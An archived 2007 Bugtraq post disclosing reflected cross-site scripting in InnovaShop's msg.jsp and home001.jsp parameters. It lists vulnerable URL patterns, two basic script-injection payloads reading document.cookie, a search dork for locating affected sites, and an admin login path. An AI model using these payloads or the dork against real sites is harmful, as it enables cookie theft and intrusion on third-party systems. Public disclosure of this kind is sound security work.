lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <BAY122-F261D88088242EEFCF2CD42EEA30@phx.gbl>
Date: Mon, 15 Oct 2007 18:55:53 +0000
From: jose luis góngora fernández <sys-project@...mail.com>
To: bugtraq@...urityfocus.com
Subject: InnovaShop™® (mgs.jps) Cross Siting Scripting

# InnovaShop™® (mgs.jps) Cross Siting Scripting
# Download:
# http://www.innovaage.com/
# http://www.innovaportal.com/
# Bug found by JosS / Jose Luis Góngora Fernández
# Contact: sys-project[at]hotmail.com
# Spanish Hackers Team
# www.spanish-hackers.com
# /server irc.freenode.net /join #fullsecure
# d0rk: "Site developed by InnovaAge™®" / "Powered by InnovaPortal©"
# Stop lammer

# Exploit In (XSS):

http://www.server/path/msg.jsp?msg=[XSS]
http://www.server/path/tc/contents/home001.jsp?contentid=[XSS]
http://www.server/innovashop/msg.jsp?msg=[XSS]
http://www.server/innovashop/tc/contents/home001.jsp?contentid=[XSS]
....all...

# Cross Siting Scripting (Code):

<script>alert(document.cookie)</script>
"><script>alert(document.cookie)</script>

# Admin Login:

http://server/admin/

//---------------------------------------\\

Greetz To: All Hackers
JosS! / Jose Luis Góngora Fernández

_________________________________________________________________
Grandes éxitos, superhéroes, imitaciones, cine y TV... 
http://es.msn.kiwee.com/ Lo mejor para tu móvil.

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ